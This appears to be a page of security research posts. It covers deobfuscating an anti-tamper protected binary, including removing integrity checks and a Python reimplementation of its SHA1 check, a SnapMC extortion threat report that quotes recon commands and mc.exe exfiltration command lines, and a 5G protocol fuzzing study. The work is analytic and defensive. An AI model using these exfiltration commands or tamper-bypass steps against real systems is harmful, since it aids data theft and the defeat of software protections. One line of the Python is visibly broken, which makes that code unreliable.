The following steps consist of leveraging the index-to-offset map to reconnect these BBL-chains with each other, and recreate the original control-flow graph. As can be seen in the captures below, the value of the state variable is set using instruction-level obfuscation. Some BBL-chains only bear a static possible destination which can be swiftly evaluated.

For dynamic-destination BBL-chains, once the register used as a state variable has been identified, the next step is to identify the determinant symbols, i.e, the registers and memory locations (globals or local variables) that affect the value of the state register when re-entering the dispatch loop.

This can be accomplished by computing the intermediate language representation (IR) of the assembly flow graph (or BBLs) and building a dependency graph from it. Here we are taking advantage of a limitation of the obfuscator: the determinants for multi-destination BBLs are always contained within the BBL subgraph formed between two dispatchers.

With those determinants identified, the task that remains is to identify what condition these determinants are fulfilling, as well as what destinations in code we jump to once the condition has been evaluated. The Z3 SMT solver from Microsoft is traditionally used around dynamic symbolic engines (DSE) as a means to finding input values leading to new paths. Here, the deobfusactor uses its capabilities to identify the type of comparison the instructions are replacing.

For example, for the equal pattern, the code asks Z3 if 2 valid destination indexes (D1 and D2) exist such that:

  • If the determinants are equal, the value of the state register is equal to D1
  • If the determinants are different, the value of the state register is equal to D2

Finally, the corresponding instruction can be assembled and patched into the assembly, replacing the identified patterns with equivalent assembly sequences such as the ones below, where

  • mod0 and mod1 are the identified determinants
  • #SREG is the state register, now free to be repurposed to store the value of one of the determinants (which may be stored in memory):
  • #OFFSET0 is the offset corresponding to the destination index if the tested condition is true
  • #OFFSET1 is the offset corresponding to the destination index if the tested condition is false
class EqualPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JZ    #OFFSET0
NOP
JMP   #OFFSET1
'''

class UnsignedGreaterPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JA    #OFFSET0
NOP
JMP   #OFFSET1
'''

class SignedGreaterPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JG    #OFFSET0
NOP
JMP   #OFFSET1
'''

The resulting CFG, since every original block has been reattached directly to its real target(s), effectively separates the dispatch loop from the significant BBLs. Below is the result of this first pass against a sample function:

This approach does not aim at handling all possible theoretical cases; it takes advantage of the fact that the obfuscator only transforms a small set of arithmetic operations.

Integrity Check Removal

Once the flow graph has been unflattened, the next step is to remove the integrity checks. These can mostly be identified using a simple graph matching algorithm (using Miasm’s “MatchGraphJoker” expressions) which also constitutes a weakness in the obfuscator. In order to account for some corner cases, the detection logic implemented here involves symbolically executing the identified loop candidates, and recording their reads against the .text section in order to provide a robust identification.

On the above graph, the hash verification flow is highlighted in yellow and the failure case (in this case, sending the execution to an address with invalid instructions) in red. Once the loop has been positively identified, the script simply links the green basic blocks to remove the hash check entirely.

“Dead” Instructions Removal

The resulting assembly is unflattened, and does not include the integrity checks anymore, but still includes a number of “dead” instructions which do not have any effect on the function’s logic and can be removed. For example, in the sample below, the value of EAX is not accessed between its first assignment and its subsequent ones. Consequently, the first assignment of EAX, regardless of the path taken, can be safely removed without altering the function’s logic.

start:
    MOV   EAX, 0x1234
    TEST  EBX, EBX
    JNZ   path1
path0:
    XOR   EAX, EAX
path1:
    MOV   EAX, 0x1

Using a dependency graph (depgraph) again, but this time, keeping a map of ASM <-> IR (one-to-many), the following pass removes the assembly instructions for which the depgraph has determined all corresponding IRs are non-performative.

Finally, the framework-provided simplifications, such as bbl-merger can be applied automatically to each block bearing a single successor, provided the successor only has a single predecessor. The error paths can also be identified and “cauterized”, which should be a no-op since they should never be executed but smoothen the rebuilding of the executable.

A Note On Antidebug Mechanisms

While a number of canonical anti-debug techniques were identified in the samples; only a few will be covered here as the techniques are well-known and can be largely ignored.

PEB->isBeingDebugged

In the example below, the function checks the PEB for isBeingDebugged (offset 0x2) and send the execution into a stack-mangling loop before continuing execution which is leads to a certain crash, obfuscating context from a naive debugging attempt.

Debug Interrupts

Another mechanism involves debug software interrupts and vectored exception handlers, but is rendered easily comprehensible once the function has been processed. The code first sets two local variables to pseudorandom constant values, then registers a vectored exception handler via a call to AddVectoredExceptionHandler. An INT 0x3 (debug interrupt) instruction is then executed (via the indirect call to ISSUE_INT3_FN), but encoded using the long form of the instruction: 0xCD 0x03.

After executing the INT 0x3 instruction, the code flow is resumed in the exception handler as can be seen below.

If the exception code from the EXCEPTION_RECORD structure is a debug breakpoint, a bitwise NOT is applied to one of the constants stored on stack. Additionally, the Windows interrupt handler handles every debug exception assuming they stemmed from executing the short version of the instruction (0xCC), so were a debugger to intercept the exception, those two elements need to be taken into consideration in order for execution to continue normally.

Upon continuing execution, a small arithmetic operation checks that the addition of one of the initially set constants (0x8A7B7A99) and a third one (0x60D7B571) is equal to the bitwise NOT of the second initial constant (0x14ACCFF5), which is the operation performed by the exception handler.

0x8A7B7A99 + 0x60D7B571 == 0xEB53300AA == ~0x14ACCFF5

A variant using the same exception handler operates in a very similar manner, substituting the debug exception with an access violation triggered via allocating a guard page and accessing it (this behavior is also flagged by ICPin).

Rebuilding The Executable

Once all the passes have been applied to all the obfuscated functions, the patches can be recorded, then applied to a free area of the new executable, and a JUMP is inserted at the function’s original offset.

Example of a function before and after deobfuscation:

Obfuscator’s Integrity Checking Internals

It is generally unnecessary to dig into the details of an obfuscator’s integrity checking mechanism; most times, as described in the previous example, identifying its location or expected result is sufficient to disable it. However, this provides a good opportunity to demonstrate the use of a DSE to address an obfuscator’s internals – theoretically its most hardened part.

ICPin output immediately highlights a number of code locations performing incremental reads on addresses in the executable’s .text section. Some manual investigation of these code locations points us to the spot where a function call or branching instruction switches to the obfuscated execution flow. However, there are no clearly defined function frames and the entire set of executed instructions is too large to display in IDA.

In order to get a sense of the execution flow, a simple jitter callback can be used to gather all the executed blocks as the engine runs through the code. Looking at the discovered blocks, it becomes apparent that the code uses conditional instructions to alter the return address on the stack, and hides its real destination with opaque predicates and obfuscated logic.

Starting with that information, it would be possible to take a similar approach as in the previous example and thoroughly rebuild the IR CFG, apply simplifications, and recompile the new assembly using LLVM. However, in this instance, armed with the knowledge that this obfuscated code implements an integrity check, it is advantageous to leverage the capabilities of a DSE.

A CFG of the obfuscated flow can still be roughly computed, by recording every block executed and adding edges based on the tracked destinations. The stock simplifications and SSA form can be used to obtain a graph of the general shape below:

Deciphering The Data Blobs

On a first run attempt, one can observe 8-byte reads from blobs located in two separate memory locations in the .text section, which are then processed through a loop (also conveniently identified by the tracking engine). With the memX symbols representing constants in memory, and blob0 representing the sequentially read input from a 32bit ciphertext blob, the symbolic values extracted from the blobs look as follows, looping 32 times:

res = (blob0 + ((mem1 ^ mem2)*mul) + sh32l((mem1 ^ mem2), 0x5)) ^ (mem3 + sh32l(blob0, 0x4)) ^ (mem4 + sh32r(blob0,  0x5))

Inspection of the values stored at memory locations mem1 and mem2 reveals the following constants:

@32[0x1400DF45A]: 0xA46D3BBF
@32[0x14014E859]: 0x3A5A4206

0xA46D3BBF^0x3A5A4206 = 0x9E3779B9

0x9E3779B9 is a well-known nothing up my sleeve number, based on the golden ratio, and notably used by RC5. In this instance however, the expression points at another Feistel cipher, TEA, or Tiny Encryption Algorithm:

void decrypt (uint32_t v[2], const uint32_t k[4]) {
    uint32_t v0=v[0], v1=v[1], sum=0xC6EF3720, i;  /* set up; sum is 32*delta */
    uint32_t delta=0x9E3779B9;                     /* a key schedule constant */
    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];   /* cache key */
    for (i=0; i<32; i++) {                         /* basic cycle start */
        v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
        v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
        sum -= delta;
    }
    v[0]=v0; v[1]=v1;
}

Consequently, the 128-bit key can be trivially recovered from the remaining memory locations identified by the symbolic engine.

Extracting The Offset Ranges

With the decryption cipher identified, the next step is to reverse the logic of computing ranges of memory to be hashed. Here again, the memory tracking execution engine proves useful and provides two data points of interest:
– The binary is not hashed in a continuous way; rather, 8-byte offsets are regularly skipped
– A memory region is iteratively accessed before each hashing

Using a DSE such as this one, symbolizing the first two bytes of the memory region and letting it run all the way to the address of the instruction that reads memory, we obtain the output below (edited for clarity):

-- MEM ACCESS: {BLOB0 & 0x7F 0 8, 0x0 8 64} + 0x140000000
# {BLOB0 0 8, 0x0 8 32} & 0x80 = 0x0
...

-- MEM ACCESS: {(({BLOB1 0 8, 0x0 8 32} & 0x7F) << 0x7) | {BLOB0 & 0x7F 0 8, 0x0 8 32} 0 32, 0x0 32 64} + 0x140000000
# 0x0 = ({BLOB0 0 8, 0x0 8 32} & 0x80)?(0x0,0x1)
# ((({BLOB1 0 8, 0x0 8 32} & 0x7F) << 0x7) | {BLOB0 & 0x7F 0 8, 0x0 8 32}) == 0xFFFFFFFF = 0x0
...

The accessed memory’s symbolic addresses alone provide a clear hint at the encoding: only 7 of the bits of each symbolized byte are used to compute the address. Looking further into the accesses, the second byte is only used if the first byte’s most significant bit is not set, which tracks with a simple unsigned integer base-128 compression. Essentially, the algorithm reads one byte at a time, using 7 bits for data, and using the last bit to indicate whether one or more byte should be read to compute the final value.

Identifying The Hashing Algorithm

In order to establish whether the integrity checking implements a known hashing algorithm, despite the static disassembly showing no sign of known constants, a memory tracking symbolic execution engine can be used to investigate one level deeper. Early in the execution (running the obfuscated code in its entirety may take a long time), one can observe the following pattern, revealing well-known SHA1 constants.

0x140E34F50 READ @32[0x140D73B5D]: 0x96F977D0
0x140E34F52 READ @32[0x140B1C599]: 0xF1BC54D1
0x140E34F54 READ @32[0x13FC70]: 0x0
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD0]: 0x67452301

0x140E34F50 READ @32[0x140D73B61]: 0x752ED515
0x140E34F52 READ @32[0x140B1C59D]: 0x9AE37E9C
0x140E34F54 READ @32[0x13FC70]: 0x1
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD4]: 0xEFCDAB89

0x140E34F50 READ @32[0x140D73B65]: 0xF9396DD4
0x140E34F52 READ @32[0x140B1C5A1]: 0x6183B12A
0x140E34F54 READ @32[0x13FC70]: 0x2
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD8]: 0x98BADCFE

0x140E34F50 READ @32[0x140D73B69]: 0x2A1B81B5
0x140E34F52 READ @32[0x140B1C5A5]: 0x3A29D5C3
0x140E34F54 READ @32[0x13FC70]: 0x3
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCDC]: 0x10325476

0x140E34F50 READ @32[0x140D73B6D]: 0xFB95EF83
0x140E34F52 READ @32[0x140B1C5A9]: 0x38470E73
0x140E34F54 READ @32[0x13FC70]: 0x4
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCE0]: 0xC3D2E1F0

Examining the relevant code addresses (as seen in the SSA notation below), it becomes evident that, in order to compute the necessary hash constants, a simple XOR instruction is used with two otherwise meaningless constants, rendering algorithm identification less obvious from static analysis alone.

And the expected SHA1 constants are stored on the stack:

0x96F977D0^0xF1BC54D1 ==> 0x67452301
0x752ED515^0x9AE37E9C ==> 0XEFCDAB89
0xF9396DD4^0x6183B12A ==> 0X98BADCFE
0x2A1B81B5^0x3A29D5C3 ==> 0X10325476
0xFB95EF83^0x38470E73 ==> 0XC3D2E1F0

Additionally, the SHA1 algorithm steps can be further observed in the SSA graph, such as the ROTL-5 and ROTL-30 operations, plainly visible in the IL below.

Final Results

The entire integrity checking logic recovered from the obfuscator implemented in Python below was verified to produce the same digest, as when running under the debugger, or a straightforward LLVM jitter. The parse_ranges() function handles the encoding, while the accumulate_bytes() generator handles the deciphering and processing of both range blobs and skipped offset blobs.

Once the hashing of the memory ranges dictated by the offset table has completed, the 64bit values located at the offsets deciphered from the second blob are subsequently hashed. Finally, once the computed hash value has been successfully compared to the valid digest stored within the RWX .text section of the executable, the execution flow is deemed secure and the obfuscator proceeds to decipher protected functions within the .text section.

def parse_ranges(table):
  ranges = []
  rangevals = []
  tmp = []
  for byte in table:
    tmp.append(byte)
    if not byte&0x80:
      val = 0
      for i,b in enumerate(tmp):
        val |= (b&0x7F)<<(7*i)
      rangevals.append(val)
      tmp = [] # reset
  offset = 0
  for p in [(rangevals[i], rangevals[i+1]) for i in range(0, len(rangevals), 2)]:
    offset += p[0]
    if offset == 0xFFFFFFFF:
      break
    ranges.append((p[0], p[1]))
    offset += p[1]
  return ranges

def accumulate_bytes(r, s):
  # TEA Key is 128 bits
  dw6 = 0xF866ED75
  dw7 = 0x31CFE1EF
  dw4 = 0x1955A6A0
  dw5 = 0x9880128B
  key = struct.pack('IIII', dw6, dw7, dw4, dw5)
  # Decipher ranges plaintext
  ranges_blob = pe[pe.virt2off(r[0]):pe.virt2off(r[0])+r[1]]
  ranges = parse_ranges(Tea(key).decrypt(ranges_blob))
  # Decipher skipped offsets plaintext (8bytes long)
  skipped_blob = pe[pe.virt2off(s[0]):pe.virt2off(s[0])+s[1]]
  skipped_decrypted = Tea(key).decrypt(skipped_blob)
  skipped = sorted( \
    [int.from_bytes(skipped_decrypted[i:i+4], byteorder='little', signed=False) \
        for i in range(0, len(skipped_decrypted), 4)][:-2:2] \
  )
  skipped_copy = skipped.copy()
  next_skipped = skipped.pop(0)
  current = 0x0
  for rr in ranges:
    current += rr[0]
    size = rr[1]
    # Get the next 8 bytes to skip
    while size and next_skipped and next_skipped = 0
      yield blob
      current = next_skipped+8
      next_skipped = skipped.pop(0) if skipped else None
    blob = pe[pe.rva2off(current):pe.rva2off(current)+size]
    yield blob
    current += len(blob)
  # Append the initially skipped offsets
  yield b''.join(pe[pe.rva2off(rva):pe.rva2off(rva)+0x8] for rva in skipped_copy)
  return

def main():
  global pe
  hashvalue = hashlib.sha1()
  hashvalue.update(b'\x7B\x0A\x97\x43')
  with open(argv[1], "rb") as f:
    pe = PE(f.read())
  accumulator = accumulate_bytes((0x140A85B51, 0xFCBCF), (0x1409D7731, 0x12EC8))
  # Get all hashed bytes
  for blob in accumulator:
    hashvalue.update(blob)
  print(f'SHA1 FINAL: {hashvalue.hexdigest()}')
  return

Disclaimer

None of the samples used in this publication were part of an NCC Group engagement. They were selected from publicly available binaries whose obfuscators exhibited features similar to previously encountered ones.

Due to the nature of this material, specific content had to be redacted, and a number of tools that were created as part of this effort could not be shared publicly.

Despite these limitations, the author hopes the technical content shared here is sufficient to provide the reader with a stimulating read.

References

Related Content

SnapMC skips ransomware, steals data

Over the past few months NCC Group has observed an increasing number of data breach extortion cases, where the attacker steals data and threatens to publish said data online if the victim decides not to pay. Given the current threat landscape, most notable is the absence of ransomware or any technical attempt at disrupting the victim’s operations.

Within the data breach extortion investigations, we have identified a cluster of activities defining a relatively constant modus operandi described in this article. We track this adversary as SnapMC and have not yet been able to link it to any known threat actors. The name SnapMC is derived from the actor’s rapid attacks, generally completed in under 30 minutes, and the exfiltration tool mc.exe it uses.

Extortion emails threatening their recipients have become a trend over time. The lion’s share of these consists of empty threats sent by perpetrators hoping to profit easily without investing in an actual attack. SnapMC however has shown itself capable of actual data breach attacks. The extortion emails we have seen from SnapMC give victims 24 hours to get in contact and 72 hours to negotiate. Even so, we have seen this actor start increasing the pressure well before countdown hits zero. SnapMC includes a list of the stolen data as evidence that they have had access to the victim’s infrastructure. If the organization does not respond or negotiate within the given timeframe, the actor threatens to (or immediately does) publish the stolen data and informs the victim’s customers and various media outlets.

Modus operandi

Initial access

At the time of writing NCC Group’s Security Operations Centers (SOCs) have seen SnapMC scanning for multiple vulnerabilities in both webserver applications and VPN solutions. We have observed this actor successfully exploiting and stealing data from servers that were vulnerable to:

  • Remote code execution in Telerik UI for ASPX.NET [1]
  • SQL injections

After successfully exploiting a webserver application, the actor executes a payload to gain remote access through a reverse shell. Based on the observed payloads and characteristics the actor appears to use a publicly available Proof-of-Concept Telerik Exploit [2].

Directly afterwards PowerShell is started to perform some standard reconnaissance activity:

  • whoami
  • whoami /priv
  • wmic logicaldisk get caption,description,providername
  • net users /priv

Note that in the last command the adversary used the /priv option, which is not a valid option for the net users command.

Privilege Escalation

In most of the cases we analyzed the threat actor did not perform privilege escalation. However in one case we did observe SnapMC trying to escalate privileges by running a handful of PowerShell scripts:

  • Invoke-Nightmare [3]
  • Invoke-JuicyPotato [4]
  • Invoke-ServiceAbuse [4]
  • Invoke-EventVwrBypass [6]
  • Invoke-PrivescAudit [7]

Collection & Exfiltration

We observed the actor preparing for exfiltration by retrieving various tools to support data collection, such as 7zip and Invoke-SQLcmd scripts. Those, and artifacts related to the execution or usage of these tools, were stored in the following folders:

  • C:\Windows\Temp\
  • C:\Windows\Temp\Azure
  • C:\Windows\Temp\Vmware

SnapMC used the Invoke-SQLcmd PowerShell script to communicate with the SQL database and export data. The actor stored the exported data locally in CSV files and compressed those files with the 7zip archive utility.

The actor used the MinIO [8] client to exfiltrate the data. Using the PowerShell commandline, the actor configured the exfil location and key to use, which were stored in a config.json file. During the exfiltration, MinIO creates a temporary file in the working directory with the file extension […].par.minio.

C:\Windows\Temp\mc.exe --config-dir C:\Windows\Temp\vmware\.x --insecure alias set <DIR> <EXFIL_LOCATION> <API key> <API SECRET>

C:\Windows\Temp\mc.exe --config-dir C:\Windows\Temp\vmware\.x --insecure cp --recursive [DIR NAME] <CONFIGURED DIRECTORY>/<REMOTE DIRECTORY>/<VICTIM DIRECTORY>

Mitigations

First, initial access was generally achieved through known vulnerabilities, for which patches exist. Patching in a timely manner and keeping (internet connected) devices up-to-date is the most effective way to prevent falling victim to these types attacks. [CB1] Make sure to identify where vulnerable software resides within your network by (regularly performing) vulnerability scanning. Furthermore, third parties supplying software packages can make use of the vulnerable software as a component as well, leaving the vulnerability outside of your direct reach. Therefore, it is important to have an unambiguous mutual understanding and clearly defined agreements between your organization, and the software supplier about patch management and retention policies. The latter also applies to a possible obligation to have your supplier provide you with your systems for forensic and root cause analysis in case of an incident. Worth mentioning, when reference testing the exploitability of specific versions of Telerik it became clear that when the software component resided behind a well configured Web Application Firewall (WAF), the exploit would be unsuccessful. Finally, having properly implemented detection and incident response mechanisms and processes seriously increases the chance of successfully mitigating severe impact on your organization. Timely detection, and efficient response will reduce the damage even before it materializes.

Conclusion

NCC Group’s Threat Intelligence team predicts that data breach extortion attacks will increase over time, as it takes less time, and even less technical in-depth knowledge or skill in comparison to a full-blown ransomware attack. In a ransomware attack, the adversary needs to achieve persistence and become domain administrator before stealing data and deploying ransomware. While in the data breach extortion attacks, most of the activity could even be automated and takes less time while still having a significant impact. Therefore, making sure you are able to detect such attacks in combination with having an incident response plan ready to execute at short notice, is vital to efficiently and effectively mitigate the threat SnapMC poses to your organization.

MITRE ATT&CK mapping

Tactic Technique Procedure
Reconnaissance T1595.002 – Vulnerability scanning SnapMC used the Acunetix vulnerability scanner to find systems running vulnerable Telerik software.
Initial Access T1190 – Exploit Public Facing Application(s) SnapMC exploited CVE-2019-18935 and SQL Injection.
Privilege Escalation   SnapMC used a combination of PowerShell cmdlets to achieve privilege escalation.
Execution T1059.001 – PowerShell SnapMC used a combination of publicly available PowerShell cmdlets.
Collection T1560.001 – Archive via Utility SnapMC used 7zip to prepare data for exfiltration.
Exfiltration T1567 – Exfiltration over Web Service T1567.002 – Exfiltration to Cloud Storage SnapMC used MinIO client (mc.exe) to exfiltrate data.

Indicators of Compromise

Type Data Notes
File location + file name C:\Windows\Temp\[0-9]{10}.[0-9]{1,8}.dll (example: c:\Windows\Temp\1628862598.87034184.dll) File name of dropped payload after successful Telerik exploitation; the first part is the epoch timestamp and last part is randomly generated
File location + file name C:\Windows\Temp\7za.exe 7zip archiving utility
File name s.ps1 SQL cmdlet
File name a.ps1 SQL cmdlet
File name x.ps1 SQL cmdlet
File name *.par.minio Temporary files created by MinIO during exfiltration
File location C:\Windows\Temp\Azure\ Folder for temporary files created by MinIO
File location C:\Windows\Temp\Azure\ Folder for temporary files created by MinIO
File location C:\Windows\Temp\Vmware\ Folder for temporary files created by MinIO
File location C:\Windows\Temp\Vmware\ Folder for temporary files created by MinIO
File name mc.exe MinIO client
Hash 651ed548d2e04881d0ff24f789767c0e Md5 hash of MinIO client
Hash b4171d48df233978f8cf58081b8ad9dc51a6097f Sha1 hash of MinIO client
Hash 0a1d16e528dc1e41f01eb7c643de0dfb4e5c4a67450c4da78427a8906c70ef3e Sha256 hash of MinIO client

References

[1] – https://nvd.nist.gov/vuln/detail/CVE-2019-18935

[2] – https://github.com/noperator/CVE-2019-18935

[3] – https://github.com/calebstewart/CVE-2021-1675

[4] – https://github.com/d0nkeys/redteam/tree/master/privilege-escalation

[5] – https://powersploit.readthedocs.io/en/latest/Privesc/Invoke-ServiceAbuse/

[6] – https://github.com/gushmazuko/WinBypass

[7] – https://powersploit.readthedocs.io/en/latest/Privesc/Invoke-PrivescAudit/

[8] – https://min.io/

The Challenges of Fuzzing 5G Protocols

11 October 2021 at 17:30

If you have ever looked at fuzzing in any depth you will quickly realize it’s not as trivial as it first appears.

There are many different types of fuzzers, but here we are focused on network fuzzers.  These fuzzers are of particular interest as they are most suited to fuzzing telecoms products/protocols, where the application and source code are generally not available.  There are very few fuzzer options when the input to these applications is via network sockets instead of the more traditional command line interface.

In this blog we will cover some basic background of fuzzing, before diving into the specifics of trying to fuzz telecoms 5G protocols using both proprietary and open source fuzzers.  We will aim to assess these fuzzers for their suitability to fuzz 5G network protocols.  We will end this post with a comparison of the fuzzers, some of the findings, and a general conclusion regarding the fuzzing of 5G telecoms protocols.

The focus of this research is on the use of the different fuzzers with regard to 5G telecoms protocols and not the specific vulnerabilities that were found, although one example vulnerability found is cited within.

Background

So, what is fuzzing?  Fuzzing is simply an automated process of sending invalid or random inputs to a program/system under test in an attempt to cause a crash or malfunction.

Fuzzing is not a new technology, however it is becoming more prominent in today’s software development life cycle. It is often used to find vulnerabilities in software that might otherwise be missed by normal unit/system tests. 

While the high-level concept of fuzzing is easy to grasp, the actual implementation of a good fuzzer is significantly more challenging.

The renewed interest in fuzzing has come about due to the increasing complexity of software and the need to effectively test and secure it.  While positive testing is generally more obvious (i.e. testing the software does what it was designed to do), negative testing in normally forgotten about (testing the software handles unexpected input without crashing or malfunctioning).

Traditional fuzzers tend to focus on fuzzing a piece of software and generate inputs via the command line or input files.  Some of the popular continuous integration frameworks (GitLab) are now starting to include fuzzing as part of the continuous integration build pipeline.

Fuzzing network protocols is a little different however, and requires sending input via network ports.  There are typically multiple network protocols involved in any communication and these protocols are layered on top of each other.  Some protocols are stateless, and others have state which adds to the complexity.  Due to the nature of network protocols the System Under Test (SUT) could be either local (on the same physical/virtual machine) or on a remote physical/virtual machine.  These differences add to the challenge of fuzzing a SUT using network protocols.

The next difficulty specific to fuzzing 5G protocols is getting access to a 5G Core or component.  There are two open-source solutions Free5GC and Open5GS which were examined for our testing.  Open5GS was chosen due to it being more stable and easier to install than Free5GC.  Neither of these solutions are commercial grade but they do give a reasonable test target to fuzz for free.

We also need some network fuzzers…

Meet the Fuzzers

One in-house, and two open-source network protocol fuzzers were used for testing: Fuzzowski 5GC, Frizzer2, and AFLNet3.  They all have completely different approaches to fuzzing from the generation of the test cases to the feedback on progress made.

Fuzzowski1 was chosen as it had previously been used to fuzz network printer protocols and was developed by NCC Group from the open-source project BooFuzz4.  Fuzzowski is open source, however the modified version used here for fuzzing 5G is not currently an open-source project.

Frizzer is a black box fuzzer that uses dynamic binary instrumentation to give coverage feedback to guide the fuzzer.  No source code or recompilation of the SUT is needed.

AFLNet was used as a comparison due to the reputation of AFL being a well-used fuzzer with proven results.  AFLNet builds on top of AFL to perform network fuzzing and track state changes using the network responses.

Fuzzowski 5GC

Fuzzowski 5GC is a template based mutational/generational fuzzer.  This simply means that the format of the input is specified, and the values defined within the format are mutated using selected algorithms depending upon the data type.

Fuzzowski 5GC can fuzz sequences of messages however it has no concept of state.  As Fuzzowski 5GC is aware of the data structure being fuzzed, it can fix checksums and length fields which helps avoid early parsing errors that would prevent testing of deeper parts of the protocol stack.

Fuzzowski 5GC is a black box fuzzer meaning it has no knowledge of the SUT other than the network API.

Frizzer

Frizzer is a black box guided mutational based fuzzer.  It uses example input and randomly mutates it using Radamsa7.  It uses Frida6 to dynamically instrument the SUT to provide code coverage feedback.

AFLNet

AFLNet is a guided mutational based fuzzer.  It uses example input and randomly mutates part of the input based on different mutation algorithms.  It has no knowledge of the input data format and uses state feedback from the network messaging to guide the fuzzing process.

AFLNet is a grey box fuzzer as it uses source code instrumentation to generate the code coverage feedback.

The Test Environment

For testing the fuzzers an ubuntu environment running Open5GS5 was used.

Open5GS is an open-source implementation of a 5G Core and EPC written using the C language.  Open5GS was chosen to emulate the 5G core as it is freely available and actively being maintained.  Due to it not being a commercial product and written in C, it makes an ideal target for fuzzing as it is unlikely to be as thoroughly tested.  It is also more likely to be focused primarily on functionality, rather than security.

As the protocol specifications are the same for both open source and commercial products, the network message formats should be representative of a real 5G Core network. We chose to limit the scope of testing to look at the NGAP, GTPU, PFCP, and DIAMETER protocols, which we will explain briefly below.

All the fuzzers were tested against the AMF component of the Open5GS software to fuzz the more complex NGAP protocol. The theory being that as one of the more complex 5G protocols, it has a higher probability of bugs – however, it is also more difficult to fuzz as a result of its complexity.

Fuzzowski 5GC was also tested against other 5G components to fuzz the GTPU, PFCP and DIAMETER protocols.

Finding vulnerabilities in these protocols and their implementation can lead to various types of attack scenarios such as denial of service, privilege escalation, remote code execution, user information disclosure and capture.

GTPU

GPRS Tunneling User Data Protocol (GTPU) is effectively a relatively simple IP based tunnelling protocol, which can have many tunnels between each set of end points.  It is used to tunnel user plane data between different network nodes.  In our testing this is the N3 interface between gNB and UPF.

PFCP

Packet Forwarding Control Protocol (PFCP) facilitates the establishment, modification, and deletion of Sx sessions within the user plane function.  PFCP rules which are passed from the control plane function to the user plane function include things like Packet Detection Rule (PDR), QoS Enforcement Rule (QER), Buffering Action Rule (BAR) etc.  In our testing this is the N4 interface between the UPF and SMF.

DIAMETER

DIAMETER is an authentication, authorization and accounting protocol and is an application layer protocol.  The base protocol can be extended by adding new commands and/or attributes.  In our testing this is the S6a interface between the MME and HSS.  The DIAMETER S6a interface allows for mobile device related location information and subscriber management information between MME and HSS.

NGAP

Next Generation Application Protocol (NGAP) supports both UE and non-UE associated services.  It includes operations such as configuration updates, UE context transfer, PDU session resource management and also support for mobility procedures.  In our testing this is the N2 interface between the AMF and gNB.

Fuzzing Results

Fuzzowski 5GC found several issues with GTPU, PFCP and DIAMETER but failed to find anything for the NGAP protocol.

Frizzer and AFLNet were only run against a subset of the 5G protocols and found some issues which at time of writing are under further investigation and, as appropriate, coordinated disclosure.

The types of crashes that can be observed in these targets could cause loss of service for subscribers of the network, preventing them from connecting to the network (denial of service), or potentially other security implications if stack/heap corruptions can be exploited to execute code or gain privileged access.

The following is an example crash caused while fuzzing the GTPU/PFCP protocols using Fuzzowski 5GC. This bug has now been patched as of October 6th 2021 (fix committed to main branch of Open5GS and released in version 2.3.4).

In the next section, we’ll discuss this bug in more depth, but also share the associated Technical Advisory and CVE details below:

PFCP Bug (CVE-2021-41794)

This shows a stack corruption caused by the function ‘ogs_fqdn_parse’ writing beyond the end of the ‘dnn’ character buffer which is defined on the stack as 100 characters (OGS_MAX_DNN_LEN = 100). If ‘message->pdi.network_instance.data’ contains the value ‘internet’ for example, it causes stack corruption to occur.

There are a few issues with the function ‘ogs_fqdn_parse’. The first is the calculation of the variable ‘len’ which is being set to the value of the first character in the ‘src’ parameter. In this example it is the lower case letter ‘i’ which equates to the numerical value 105. The length of the ‘src’ parameter is 8, however this is not checked until it’s too late. The memcpy reads past the end of the ‘src’ parameter and also writes beyond the end of the ‘dst’ parameter (which is actually the variable ‘dnn’ on the stack).

As the ‘src’ parameter is ultimately coming from the PFCP Session Establishment Request it could be manipulated to contain any value and the length controlled by setting the first byte.

Comparative Performance of the Selected Fuzzers

Fuzzowski 5G

Fuzzowski 5GC proved to be good at finding bugs in state less protocols, however various modifications were made to Fuzzowski 5GC in an attempt to fuzz the NGAP protocol.

The biggest issue with using Fuzzowski 5GC is that it needs the structure of the messages to be defined.  Creating message definitions, sequences, and functionality to handle message sequences is a slow and manual process.  The messages are generally created from WireShark captures and therefore tend not to cover all parts of the protocol specification (e.g., optional elements).

Frizzer

Frizzer was easy to setup as the source code was available for the SUT.  If there had been no source code, some reverse engineering would be required to find the function/address of the network processing section of the application.

The SCTP protocol was added to Frizzer so that it could connect to the AMF.  It was also modified to keep the SCTP connection open between tests as the AMF would fail otherwise.

As frizzer uses Frida6 to dynamically instrument the binary there is no need for special compilation of the application, as required with AFLNet.

Frizzer has the same issues as AFLNet regarding checksums, although it may be possible to use Frida6 to dynamically change the execution path of the SUT and force checksum calculations to pass.

Frizzer testing was limited as without fixing a bug in the AMF the testing kept stopping after a few hundred test cases.

AFLNet

AFLNet required a reasonable amount of work to setup.  The program defaults were not suitable for our testing purposes, so they were overridden on the command line.  The SCTP protocol was added to the connection types to prevent the SCTP protocol from being fuzzed.

For AFLNet to function the SUT needs to be compiled with instrumentation.  To compile the AMF application, the build process for Open5GS was modified to instrument the code.  Due to the AMF application being initialized for every test by AFLNet, the process of fuzzing was very slow compared to the other fuzzers.

Because of the slow speed of fuzzing, minimal time and effort was spent to enable fuzzing of a single NGAP message.  The mutational nature of AFLNet means it would not be very effective at dealing with length and checksum parameters, making it difficult for it to explore the deeper parts of the protocol.

What We Learnt by Fuzzing 5G Protocols

This research shows that fuzzing 5G telecoms protocols is not as straightforward as downloading your favorite open source fuzzer and hitting go!  Sure, they might find a few bugs in the simple stateless protocols, but they fail to find those deeper, harder to reach issues. Fuzzing 5G protocols introduces specific challenges, such as the need for binary instrumentation of commercial 5G components for which source code is unavailable.

